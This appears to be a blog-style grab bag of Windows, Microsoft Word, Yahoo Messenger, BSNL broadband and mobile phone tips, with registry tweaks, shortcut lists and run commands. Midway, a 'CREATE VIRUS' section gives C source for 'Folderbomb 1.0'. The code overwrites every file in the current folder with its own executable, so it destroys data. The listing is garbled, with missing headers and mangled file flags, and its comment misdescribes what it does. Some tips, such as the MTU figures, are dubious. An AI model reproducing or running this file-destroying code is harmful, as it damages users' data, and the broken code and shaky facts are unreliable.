Multiple Logins in yahoo without Software

1) Go to Start
2) Navigate to HKEY_CURRENT_USER-->Software-->Yahoo-->Pager-->Test
3)ON the Right side if the page , Right click and choose new Dword Value.
4) Rename it as " Plural ".
5)Double click and assign a decimal value of 1.
6) Now close registry and restar yahoo messenger and try Multiple Login

Increase the speed of your internet connection without a New Modem

As more and more people get quick connections to the internet, such as cable or ADSL, it becomes apparent to the user of a simple dial-up modem that the World Wide Web can quickly turn into the World Wide Wait. Here a trick that can help speed up your current modem without shelling out the big bucks.
   
There is a setting located in your windows registry called the Maximum Transfer Unit (MTU). This determines the size of the packets of data sent between your and your server. In Windows 95, this setting is has a value of 1,500 bytes when the actual size of internet packets is 1,000 bytes. This can sometimes slow things down. To remedy the situation, simply follow these steps:
In the registry editor (Start > Run > regedit.exe), navigate to
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans.
 
In the NetTrans folder you should find another folder named "000x" in which x represents a fourth digit. Right-click on the "000x" folder and select New and StringValue. Rename the item that appears in the panel on the right side to MaxMTU, then double-click it to bring up the Edit String box and give it a velue of 1002.
 
Remember to keep playing with the MaxMTU value until you feel that your internet connection has greatly sped up. Some people report huge speed gains using this tricks, while others hardly notice a difference. In any case, it's definetly worth a try.

Document With Password

You can protect your document by applying password so that unauthorized person can not display as well as modify your document. You can apply two types of passwords:
Password to open the document: 
If it is applied then you have to give the correct password to open the document, otherwise you cannot open the document.
Password to modify the document: 
If it is applied then you have to give the correct password to modify the document, otherwise your document is opened but you cannot modify the document. It means that your document becomes read-only.
To apply a password to document, follow these steps.
* Open Save As dialog box by selecting "Save As" command from File menu.
* Click "Tools" button of Save As dialog box and choose "General Options" from drop down menu, "Save" dialog box appears as shown in figure below.
* Enter first password in "Password to open" text box and second password in "Password to modify" text box (if required) and click "Ok" button of dialog box. Microsoft Word will open "Confirm Password" dialog box for the confirmation of passwords. The maximum length of password is 15 characters. 
* Re-enter the password to open and password to modify and click "Ok" button of Confirm Password dialog boxes one by one.
* Click "Save" button of Save As dialog box.

Microsoft(MS) Word Tips

Select the text you want to translate. You can type it there and then or you could paste it from somewhere. If you need to select the entire document, and if it is very lengthy, you can go back to the "edit" tab and click "select all." Or you can just highlight the entire or part of the text by clicking the left mouse button and dragging it across the text you want to highlight.
Click on Review button on Menu bar.
Click on Translate in the Review tab.
A task pane will appear on the right side of the document. Select which language you would like to translate into or the existing language it is in. Here is where you can select which language to translate to or from.
The selected or highlighted text will be translated in the lower part of the task pane.  You can get the translation of the same text into different languages instantly as you choose the language under the option of "To".
If you need to translate the selected text into a language that is not included in the given list, click on Translation options and select the particular language you want.
This helpful feature to translate text in Microsoft Word is very handy. However, there is no substitute for a human professional translator as good and meaningful translation demands comprehension as well as understanding of cultural references, artistic quality and talent. So there are chances that the translation done by a computer program will lack profundity as well as meaning.





CREATE VIRUS

Run this on your own responsibility*/
VIRUS CODE-2
/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......


#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_R
DONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

Microsoft(MS) Word Shorcut keys

Keyboard Shortcut

Result in Microsoft Word

CTRL and A
Selects all in the current document.
CTRL and B
Bold text.
CTRL and C
Copies the item or text to the Clipboard and can be pasted using CTRL and V.
CTRL and D
Displays the Font dialogue box.
CTRL and E
Centre Alignment.
CTRL and F
Displays the Find dialog box, to search the current document.
CTRL and G
Displays the Go to dialog box, to go to a specific location in the current document.
CTRL and H
Displays the Replace dialogue box.
CTRL and I
Italic text.
CTRL and J
Full Justification.
CTRL and K
Create Hyperlink
CTRL and L
Left Alignment
CTRL and M
Tab
CTRL and N
Creates a new document.
CTRL and O
Displays the Open File dialogue box.
CTRL and P
Displays the Print dialog box.
CTRL and R
Right Alignment.
CTRL and S
Displays the Save dialog box.
CTRL and U
Underline text
CTRL and V
Pastes the copied item or text from the Clipboard into the current position in the document.
CTRL and X
Cuts the item or text selected to the Clipboard.
CTRL and Y
Redo the last undone action.
CTRL and Z
Undoes the last action.
CTRL and ENTER
Insert Page Break.
CTRL and F2
Show Print preview.
CTRL and F4
Closes the active document window.
CTRL and F6
Opens the next document window.

Keyboard Shortcut

Result in Microsoft Word

F1 key
Get help or use the Office assistant.
SHIFT and F1 Key
Context sensitive help.
F2 Key
Move text or image.
SHIFT and F2 Key
Copy Text.
F3 Key
Insert an auto text entry.
SHIFT and F3 Key
Change the case of the selected text.
F4 Key
Perform last action again.
SHIFT and F4 Key
Perform a Find or Go to action again.
F5 Key
Displays the Go to dialogue box, from here you can also Find and Replace.
SHIFT and F5 Key
Move to a previous revision.
F6 Key
Go to the next frame or pane.
SHIFT and F6 Key
Go to the previous frame or pane.
F7 Key
Launch the Spell checker.
SHIFT and F7 Key
Launch the Thesaurus.
F8 Key
Extend the current selection.
SHIFT and F8 Key
Shrink the current selection.
F9 Key
Update the selected fields.
SHIFT and F9 Key
Switch between a field code and it's result.
F10 Key
Activate the menu bar.
SHIFT and F10 Key
Display a Shortcut Menu. Same as right clicking.
F11 Key
Go to the next field.
SHIFT and F11 Key
Go to the previous field.
F12 Key
Save file As, equivalent to tools menu.
SHIFT and F12 Key
Save document, equivalent to tools menu.

TIPS For CTRL

These are achieved by holding down the CONTROL (CTRL) key and pressing the assigned key
To Select all items on a webpage use CTRL and A.

To Copy a selected item to the clipboard use CTRL and C.

To Paste an item from the clipboard into a document use CTRL and V.

To Add the current page/document to your favorites use CTRL and D.

To Open the IE search utility use CTRL and E.

To Open the FIND box to search the current document use CTRL and F.

To Open the History utility use CTRL and H.

To Open the Favorites utility use CTRL and I.

To Go to a new location/document use CTRL and L. Also CTRL and O.

To Open a new Explorer window use CTRL and N.

To Print the current page/document use CTRL and P.

To Refresh the current page/document use CTRL and R or use the F5 key.

To Save the current document/page use CTRL and S.

To Close the current Explorer window use CTRL and W.
These are achieved by holding down and pressing a combination of keys

To go to your default homepage use ALT and the HOME key.

To go forward one page (equivalent to the FORWARD button) use ALT and the right arrow key.

To go back one page (equivalent to the BACK button) use ALT and the left arrow key.

Tips

Searching:
"Ctrl+F" -- Opens the Find dialog box.
"F3" -- Repeats the last search.

Browsing:
"Keypad +" -- Expands the selected branch.
"Keypad -" -- Collapses the selected branch.
"Keypad *" -- Expands all the selected branch's sub keys.
"Up Arrow" -- Selects the previous key.
"Down Arrow" -- Selects the next key.
"Left Arrow" -- Collapses the selected branch if it's not collapsed; otherwise, selects the parent key.
"Right Arrow" -- Expands the selected branch if it's not already expanded; otherwise, selects the key's first sub key.
"Home" -- Selects My Computer.
"End" -- Selects the last key that's visible in the key pane.
"Page Up" -- Moves up one page in the key pane.
"Page Down" -- Moves down one page in the key pane.
"Tab" -- Moves between the key and value panes.
"F6" -- Moves between the key and value panes.

Others:
"Delete" -- Deletes the select branch or value.
"F1" -- Opens Regedit's Help.
"F2" -- Renames the selected key or value.
"F5" -- Refreshes the key and value panes.
"F10" -- Opens Regedit's menu bar.
"Shift+F10" -- Opens the shortcut menu for the selected key or value.
"Alt+F4" -- Closes Regedit.

Tips for your System or PC

Many computers take a lot of time to boot (or start ).This is due to many reasons.

Some slight changes can do wonders for your system:

1. Press start->run then type msconfig and press enter.

Go to the startup tab. Here you will see a list of startup items. These are all the programs that automatically start when you boot your PC. It is these that slow down the boot up process.
                                 So uncheck all the unwanted items like ms-office, messengers other utilities that u may not need at startup). Don't uncheck your antivirus software.

Restart your Pc to and see for yourself, your pc will now boot faster....  
    
2. A great new feature in Microsoft Windows XP is the ability to do a boot defragment. This places all boot files next to each other on the disk to allow for faster booting. By default this option is enabled, but on some systems it is not, so below is the information on how to turn it on:

Go to Start Menu and Click Run
Type in regedit then click ok
Find "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOpt imizeFunction"
Select "Enable" from the list on the right
Right on it and select "Modify"
Change the value to Y .
Reboot your Pc and see the change yourself.
 
3.SPEED UP BOOT BY DISABLING UNUSED PORTS.!!
You may have tried many tweaks like modifying windows XP start-up applications, prefetches, unload DLLs method, etc. And yes those methods do work for me.
                    I have just accidentally found out another way to give you an extra boost in windows XP's boot performance. This is done by disabling your unused devices in Device Manager. for example, if you don't have input devices that are connected to one of your USB's or COM ports, disabling them will give you an extra performance boost in booting. Go to Control Panel -> System -> Hardware tab -> device manager Disable devices that you don't use for your PC and then restart.

RUN Program Short Cut Keys

Run Commands In Windows XP
You can access all these programs by going through START-->RUN or Simply Click Windows Key+R

SQL Client Configuration - cliconfg
System Configuration Editor - sysedit
System Configuration Utility - msconfig
System File Checker Utility (Scan Immediately)- sfc /scannow
System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce
System File Checker Utility (Scan On Every Boot) - sfc /scanboot
System File Checker Utility (Return to Default Setting)- sfc /revert
System File Checker Utility (Purge File Cache)- sfc /purgecache
System File Checker Utility (Set Cache Size to size x)-sfc/cachesize=x
System Information - msinfo32.
Task Manager – taskmgr
System Properties - sysdm.cpl
Task Manager – taskmgr
TCP Tester - tcptest
Telnet Client - telnet
Tweak UI (if installed) - tweakui
User Account Management- nusrmgr.cpl
Utility Manager - utilman
Windows Address Book - wab
Windows Address Book Import Utility - wabmig
Windows Backup Utility (if installed)- ntbackup
Windows Explorer - explorer
Windows Firewall- firewall.cpl
Windows Magnifier- magnify
Windows Management Infrastructure - wmimgmt.msc
Windows Media Player - wmplayer
Windows Messenger - msmsgs
Windows Picture Import Wizard (need camera connected)- wiaacmgr
Windows System Security Tool – syskey
Windows Update Launches - wupdmgr
Windows Version (to show which version of windows)- winver
Windows XP Tour Wizard - tourstart
Wordpad - write
Password Properties - password.cpl
Performance Monitor - perfmon.msc
Phone and Modem Options - telephon.cpl
Phone Dialer - dialer
Pinball Game - pinball
Power Configuration - powercfg.cpl
Printers and Faxes - control printers
Printers Folder – printers
Private Character Editor - eudcedit
Quicktime (If Installed)- QuickTime.cpl
Real Player (if installed)- realplay
Regional Settings - intl.cpl
Registry Editor - regedit
Registry Editor - regedit32
Remote Access Phonebook - rasphone
Remote Desktop - mstsc
Removable Storage - ntmsmgr.msc
Removable Storage Operator Requests - ntmsoprq.msc
Resultant Set of Policy (XP Prof) - rsop.msc
Scanners and Cameras - sticpl.cpl
Scheduled Tasks - control schedtasks
Security Center - wscui.cpl
Services - services.msc
Shared Folders - fsmgmt.msc
Shuts Down Windows - shutdown
Sounds and Audio - mmsys.cpl
Spider Solitare Card Game - spider
Malicious Software Removal Tool - mrt
Microsoft Access (if installed) - access.cpl
Microsoft Chat - winchat
Microsoft Excel (if installed) - excel
Microsoft Frontpage (if installed)- frontpg
Microsoft Movie Maker - moviemk
Microsoft Paint - mspaint
Microsoft Powerpoint (if installed)- powerpnt
Microsoft Word (if installed)- winword
Microsoft Syncronization Tool - mobsync
Minesweeper Game - winmine
Mouse Properties - control mouse
Mouse Properties - main.cpl
Nero (if installed)- nero
Netmeeting - conf
Network Connections - control netconnections
Network Connections - ncpa.cpl
Network Setup Wizard - netsetup.cpl
Notepad - notepad
Nview Desktop Manager (If Installed)- nvtuicpl.cpl
Object Packager - packager
ODBC Data Source Administrator- odbccp32.cpl
On Screen Keyboard - osk
Opens AC3 Filter (If Installed) - ac3filter.cpl
Outlook Express - msimn
Paint – pbrush
Keyboard Properties - control keyboard
IP Configuration (Display Connection Configuration) - ipconfi/all
IP Configuration (Display DNS Cache Contents)- ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)- ipconfig /flushdns
IP Configuration (Release All Connections)- ipconfig /release
IP Configuration (Renew All Connections)- ipconfig /renew
IP Configuration(RefreshesDHCP&Re-RegistersDNS)-ipconfig/registerdns
IP Configuration (Display DHCP Class ID)- ipconfig/showclassid
IP Configuration (Modifies DHCP Class ID)- ipconfig /setclassid
Java Control Panel (If Installed)- jpicpl32.cpl
Java Control Panel (If Installed)- javaws
Local Security Settings - secpol.msc
Local Users and Groups - lusrmgr.msc
Logs You Out Of Windows - logoff.....
Accessibility Controls - access.cpl
Accessibility Wizard - accwiz
Add Hardware - Wizardhdwwiz.cpl
Add/Remove Programs - appwiz.cpl
Administrative Tools control - admintools
Adobe Acrobat (if installed) - acrobat
Adobe Designer (if installed)- acrodist
Adobe Distiller (if installed)- acrodist
Adobe ImageReady (if installed)- imageready
Adobe Photoshop (if installed)- photoshop
Automatic Updates - wuaucpl.cpl
Bluetooth Transfer Wizard – fsquirt
Calculator - calc
Certificate Manager - certmgr.msc
Character Map - charmap
Check Disk Utility - chkdsk
Clipboard Viewer - clipbrd
Command Prompt - cmd
Component Services - dcomcnfg
Computer Management - compmgmt.msc
Control Panel - control
Date and Time Properties - timedate.cpl
DDE Shares - ddeshare
Device Manager - devmgmt.msc
Direct X Control Panel (If Installed)- directx.cpl
Direct X Troubleshooter- dxdiag
Disk Cleanup Utility- cleanmgr
Disk Defragment- dfrg.msc
Disk Management- diskmgmt.msc
Disk Partition Manager- diskpart
Display Properties- control desktop
Display Properties- desk.cpl
Display Properties (w/Appearance Tab Preselected)- control color
Dr. Watson System Troubleshooting Utility- drwtsn32
Driver Verifier Utility- verifier
Event Viewer- eventvwr.msc
Files and Settings Transfer Tool- migwiz
File Signature Verification Tool- sigverif
Findfast- findfast.cpl
Firefox (if installed)- firefox
Folders Properties- control folders
Fonts- control fonts
Fonts Folder- fonts
Free Cell Card Game- freecell
Game Controllers- joy.cpl
Group Policy Editor (XP Prof)- gpedit.msc
Hearts Card Game- mshearts
Help and Support- helpctr
HyperTerminal- hypertrm
Iexpress Wizard- iexpress
Indexing Service- ciadv.msc
Internet Connection Wizard- icwconn1
Internet Explorer- iexplore
Internet Setup Wizard- inetwiz
Internet Properties- inetcpl.cpl

Windows XP Tips



This tweak reduces the time XP waits before automatically closing any running programs when you give it the command to shutdown.
Go to Start then select Run
Type 'Regedit' and click ok
Find 'HKEY_CURRENT_USER\Control Panel\Desktop\'
Select 'WaitToKillAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'
Now select 'HungAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'
 
Now find 'HKEY_USERS\.DEFAULT\Control Panel\Desktop'
Select 'WaitToKillAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'
Now find 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\'
Select 'WaitToKillServiceTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'

BSNL Internet Repair Tips


If your BSNL Internet is not working then Follow this Steps .
> First Check Modem Light - POWER Light , DSL Light , INTERNET Light ans WiFi Light is Working Then Fellow This Steps  : 
- Open Internet Explorer  
- type : 192.168.1.1
- one page will open and it will ask for ID and Password 
- Type : ID as : admin 
            password : admin 
then u will find BSNL Complete Information about your Internet Connection 
 


PC Tricks

Tricks 2 Increase PC Life : 
- Shut down property
- Don't place many icons in Desktop
- Keep 50% free space in C Drive
- Don't keep folders in Task Bar.



PC TRICKS

Unwanted Apps  Start on each booth ?

Do this Press win+r 
Type msconfig
Press Enter & on Start up tab uncheck unwanted App List.

BSNL Internet Tips


Do you want to get your BSNL Broadband usage alerts to your mobile ?

Then , GO To : hhtp://bbusage.bsnl.in 
and Register your  MOBILE Number

Mobile Tricks

How to Increase  s60 Mobile Sound :
> goto tools
>Settings
>enchacement
>settings
>change enchancement setting headset to loopset
> ur done

Tricks

Restoring a Lost  Desktop is Simple Now :

> Start
>Run Type a "period"
>Then Press ENTER.
You can do this to restore desktop.